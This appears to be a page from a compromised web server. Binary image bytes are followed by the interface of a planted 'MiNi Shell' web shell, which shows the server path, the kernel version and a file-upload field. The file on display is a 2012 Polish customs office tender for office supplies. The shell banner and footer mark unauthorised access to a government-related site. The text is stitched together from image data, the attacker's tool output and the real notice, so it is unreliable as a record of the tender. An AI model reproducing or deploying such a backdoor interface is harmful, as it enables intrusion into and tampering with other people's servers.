JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120127/26372-N-2012.html

<p class="kh_header"><b>Biała Podlaska: Dostwa artykułów biurowych</b><br>
<b>Numer ogłoszenia: 26372 - 2012; data zamieszczenia: 27.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Białej Podlaskiej , ul. Celników Polskich 21, 21-500 Biała Podlaska, woj. lubelskie, tel. 83 344 98 33, faks 83 342 76 73.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialapodlaska.uc.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostwa artykułów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sprzedaż wraz z dostawą, w okresie od dnia podpisania umowy do dnia 31 grudnia 2012 r., lub do wykorzystania kwoty na jaką zostanie zawarta umowa, transportem i na koszt Wykonawcy artykułów biurowych, łącznie z wniesieniem do magazynu Zamawiającego mieszczącego się w siedzibie Izby Celnej w Białej Podlaskiej przy ul. Celników Polskich 21.
2.	Zakres asortymentowy przedmiotu zamówienia wraz z podaniem poszczególnych ilości określony został w poniższej tabeli:

L.p.	Nazwa towaru	Jednostka miary	Zapotrzebowanie
1	Blok do pisania A4	szt.	119
2	Blok Flipchart w formacie 65 x 100 cm 20 kartkowy	szt.	8
3	Brulion A4 - 96 kk, oprawa twarda	szt.	67
4	Brulion A4 -192 kk, oprawa twarda	szt.	169
5	Cienkopisy czarne	szt.	300
6	Cienkopisy czerwone	szt.	250
7	Cienkopisy niebieskie	szt.	250
8	Długopis z możliwością wymiany wkładu. Kolor niebieski	szt.	2000
9	Dziurkacz do 100 kartek	szt.	79
10	Dziurkacz do 20 kartek	szt.	70
11	Dziurkacz do 40 kartek	szt.	50
12	Etykieta A-4 samoprzylepna, biała. Opakowanie=100 arkuszy	op.	11,5
13	Folia laminacyjna A5 rozmiar 154 mm x 216 mm Opakowanie=100 szt.	op.	2
14	Folia laminacyjna A6 rozmiar 111 mm x 154 mm Opakowanie=100 szt.	op.	1
15	Folia laminacyjna rozmiar 75 mm x 106  mm Opakowanie=100 szt.	op.	2
16	Grzbiety do bindowania 10 mm A4 - do max 65kartek	szt.	220
17	Grzbiety do bindowania 14 mm A4 -  do max 122 kartek	szt.	205
18	Grzbiety wsuwane A4	szt.	100
19	Gumka do ścierania	szt.	143
20	Gumka recepturka	kg	34
21	Kalkulator	szt.	70
22	Karteczki indeksujące samoklejące wym. 20x50mm, różne kolory	szt.	200
23	Karton rysunkowy. Ciemno zielony nr 74. Opakowanie=20 arkuszy (Brystol)	op.	1
24	Klej butapren w tubie poj. 40ml.	szt.	36
25	Klej w sztyfcie	szt.	400
26	Klips aktowy (archiwizacyjny)	szt.	5171
27	Klips biurowy 32 mm - Opakowanie=12 szt.	op.	600
28	Koperta B4 250x353 mm, biała samoklejąca	szt.	13045
29	Koperta C5- koperta zaklejana na mokro, wym. 162x229 mm, bez okienka	szt.	4411
30	Koperta C6 Nk biała, wym. 114x162 mm z okienkiem prawy dół	szt.	6070
31	Koperta C6 NK biała, wym. 114x162 mm, bez okienka	szt.	27353
32	Koperta CD na płyty	szt.	300
33	Koperta DL biała, wym. 110x220 bez okienka, samoklejąca	szt.	145
34	Koperta DL z okienkiem prawy dół 110x220, samoklejąca	szt.	8200
35	Korektor pisak	szt.	150
36	Korektor taśma	szt.	80
37	Korektor w płynie	szt.	117
38	Kostka biurowa kolor 8,5x8,5x4	szt.	60
39	Linijka 30cm	szt.	150
40	Linijka 40 cm	szt.	75
41	Maczałka	szt.	1
42	Marker do znakowania CD/DVD	szt.	118
43	Marker pernamentny. Końcówka 1mm  	szt.	110
44	Marker pernamentny. Końcówka 3mm  	szt.	668
45	Marker wodoodporny, czarny	szt.	1048
46	Masa czyszcząca stemple metalowe	szt.	6
47	Mata biurowa pod stemple formatu A4	szt.	61
48	Nożyczki biurowe	szt.	262
49	Nóż do papieru	szt.	150
50	Obwoluta A4	szt.	75
51	Okładki bezbarwne do bindowania A4	szt.	392
52	Okładki kolorowe do bindowania A4	szt.	392
53	Okładki na wydruki komputerowe A4. Typ L- otwarte na górze i wzdłuż brzegu	szt.	150
54	Ołówek z gumką	szt.	500
55	Papier ekri A4 młotkowany. Opakowanie=20 arkuszy	op.	5
56	Papier fotograficzny. Format 13cmx18cm. Wykończenie: Glossy, Gramatura: min. 225g. Opakowanie=50 arkuszy	op.	2
57	Papier ozdobny biały, płótno gramtura 230g/m2  Opakowanie=20 arkuszy	op.	123
58	Papier ozdobny kremowy, płótno gramtura 230g/m2  Opakowanie=20 arkuszy	op.	2
59	Papier szary Gr.60	kg	27
60	Pinezki tablicowe kolorowe. Opakowanie=100 szt.	op.	33
61	Plastelina. Opakowanie=6 szt.	op.	30
62	Podkładka gumowa do stempli A-5	szt.	31
63	Przybornik biurowy	szt.	122
64	Rozszywacz	szt.	145
65	Segregator A4/50. Wykonany z twardej tektury pokrytej jednostronnie okleiną PCV.	szt.	1153
66	Segregator A4/70. Wykonany z twardej tektury pokrytej jednostronnie okleiną PCV.	szt.	14000
67	Segregator na 26 płyt CD	szt.	13
68	Skoroszyt  z perforacją	szt.	410
69	Skoroszyt z zawieszką	szt.	1790
70	Spinacz krzyżowy 70 mm - opakowanie 12 szt.	szt.	276
71	Szuflada na dokumenty	szt.	130
72	Tablica korkowa 80x120	szt.	43
73	Tablica-Flipchart 65x100 cm na regulowanym trójnogu, powierzchnia posiadająca właściwości magnetyczne, przystosowana do pisania pisakami na sucho ścieralnymi	szt.	1
74	Taśma dwustronna. Rozmiar 50mm/10m	szt.	80
75	Taśma malarska wąska	szt.	22
76	Teczka do podpisu oprawa twarda, harmonijka, 10 przekładek	szt.	2
77	Teczka papierowa, skrzydłowa z gumką. Rozmiar A4	szt.	154
78	Teczka papierowa, wiązana, biała. Rozmiar A4	szt.	1746
79	Teczka wiązana plastikowa. Rozmiar A4	szt.	130
80	Teczka z gumką, papierowa. Rozmiar A4	szt.	147
81	Teczka z rączką, papierowa. Rozmiar A4. Jednolity kolor	szt.	37
82	Temperówka metalowa	szt.	184
83	Tusz do stempli kauczukowych czarny. Opakowanie=20-22ml.	szt.	21
84	Tusz do stempli kauczukowych czerwony. Opakowanie=20-22ml.	szt.	103
85	Tusz do stempli kauczukowych zielony. Opakowanie=20-22ml.	szt.	49
86	Tusz do stempli metalowych czarny. Opakowanie=20-22ml.	szt.	82
87	Wąsy do skoroszytów. Opakowanie 250szt.	op.	27
88	Wkład do długopisu, kolor niebieski. Odpowiednie do długopisów z pozycji 8.	szt.	331
89	Zakreślacz	szt.	1096
90	Zeszyt A4 80kk. Oprawa miękka	szt.	28
91	Zeszyt A5  60 kk. Oprawa miękka	szt.	44
92	Zszywacz duży	szt.	80
93	Zszywacz mały	szt.	150
94	Zszywki 23/10. Opakowanie= 1000 szt.	op.	81
95	Zszywki 24/6. Opakowanie= 1000 szt.	op.	372
96	Zszywki 24/8. Opakowanie= 1000 szt.	op.	400

3.	Użyte w opisie skróty oznaczają odpowiednio:
1)	szt. - sztuk;
2)	op. - opakowanie.
4.	Podane ilości oraz wskazany asortymentowo rodzaj artykułów biurowych mają charakter ilości maksymalnych. Zamawiający zastrzega sobie prawo wykorzystania w ramach umowy jedynie takich ilości, jakie będą niezbędne do prawidłowego, nieprzerwanego funkcjonowania Zamawiającego. Wszelkie roszczenia finansowo - prawne Wykonawcy z tego tytułu są wyłączone.
5.	Realizacja zamówienia dokonywana będzie na koszt i ryzyko Wykonawcy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie pobiera się.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku, na podstawie załączonego do oferty oświadczenia, o którym mowa w art. 44 ustawy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże się należytym wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch dostaw polegających na dostawie artykułów biurowych o wartości brutto co najmniej 100.000,00 zł. (sto tysięcy) dla każdej z dostaw. 
Przez wartość dostawy Zamawiający rozumie łączną wartość dostarczonych artykułów w ramach jednej umowy. Przez jedną dostawę Zamawiający rozumie sumę dostaw w ramach jednej umowy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku, na podstawie załączonego do oferty oświadczenia, o którym mowa w art. 44 ustawy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku, na podstawie załączonego do oferty oświadczenia, o którym mowa w art. 44 ustawy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku, na podstawie załączonego do oferty oświadczenia, o którym mowa w art. 44 ustawy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru oferty na warunkach określonych we Wzorze 
umowy - Załącznik Nr 5 do SIWZ, tj.:
Zmiany osób upoważnionych do współdziałania w ramach realizacji umowy. Każda zmiana umowy nastąpi w drodze aneksu do umowy na wniosek Zamawiającego lub Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bialapodlaska.uc.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Izba Celna w Białej Podlaskiej 
ul. Celników Polskich 21 
21-500 Biała Podlaska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2012 godzina 09:00, miejsce: Izba Celna w Białej Podlaskiej 
ul. Celników Polskich 21 
21-500 Biała Podlaska
pok. Nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com